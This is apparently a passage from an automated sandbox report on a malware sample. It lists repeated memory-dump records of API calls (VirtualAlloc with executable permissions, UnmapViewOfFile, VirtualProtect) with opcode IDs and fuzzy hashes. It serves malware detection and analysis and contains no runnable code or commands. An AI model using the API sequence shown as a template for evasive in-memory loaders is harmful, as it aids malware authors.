                        • Instruction Fuzzy Hash: E9116060C08289DEEF01DBE894097EEBFB45B21705F044098DA442B282D3BA17588BB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Executed Functions

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019E575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 0019E625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019E63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019E770
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2096150836.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: 880c5c81e2e1976ec981187a5533cbaba6ebb3d1247c84d52413e401bf50f109
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: 6DB198B4E00109DFCB48CF84C591EAEB7B5BF88304F248159E919AB355D735EE82CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019DFD4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2096150836.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: df304f0021e6e0d437b90b3cd95d023e61d48827e8e10396f09c9c1849e37b87
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 5A110060D08289EEEF01D7E8D40A7EEBFB55B21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Executed Functions

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019E575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 0019E625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019E63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019E770
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2097986294.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: 880c5c81e2e1976ec981187a5533cbaba6ebb3d1247c84d52413e401bf50f109
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: 6DB198B4E00109DFCB48CF84C591EAEB7B5BF88304F248159E919AB355D735EE82CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019DFD4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2097986294.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: df304f0021e6e0d437b90b3cd95d023e61d48827e8e10396f09c9c1849e37b87
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 5A110060D08289EEEF01D7E8D40A7EEBFB55B21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Executed Functions

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001EE575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 001EE625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001EE63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001EE770
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2100119282.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: 9b3abedbca77c78346b3b53129e99b4b163c2363180435cc8638868f85b652ee
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: 85B198B5E00109DFCB48CF85C591EAEB7B5BF88304F248159E919AB355D735EE82CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001EDFD4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2100119282.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: 738635efc9121062dd9be3251f5c3d9d0afedcae698c334c78910768e5afd0e6
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 86113060D082CDDEEB01D7E894097EEBFB55F21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Executed Functions

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001FE575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 001FE625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001FE63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001FE770
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2101128354.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: c799c7000676d9b31d1e41de175b68fe9ad3e4d1961a4037ba5c9b97be4bc0fa
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: B9B199B4E00109DFCB48CF85C591AAEB7B6BF88314F248159E915AB355D735EE82CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001FDFD4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2101128354.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: 9579a99de9f248dce1337c0b51852080bef0ea809efadb1c8204388a578e4165
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 991130A0D0828DDEEB01D7E89409BFEBFB55B21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Executed Functions

                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 000EE575
                        • UnmapViewOfFile.KERNEL32(?), ref: 000EE625
                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 000EE63F
                        • VirtualProtect.KERNEL32(?,?,00000000), ref: 000EE770
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2337245294.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: b9cfccb2cacb7ddc3ea003575be257f3765b200102621a9bc919e20b70511b1d
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: E6B198B5E00149DFCB48CF85C591EAEB7B5BF88304F208159E919AB355D735EE82CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 000EDFD4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2337245294.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: e57af119b9438eb41fd0c81363060c3edbc9cb43bbbf35dc2686fcfa10d8bdc4
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 84113060D082CDEEEB01D7E8C4097EEBFB55F11704F044098D6457B282D2BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions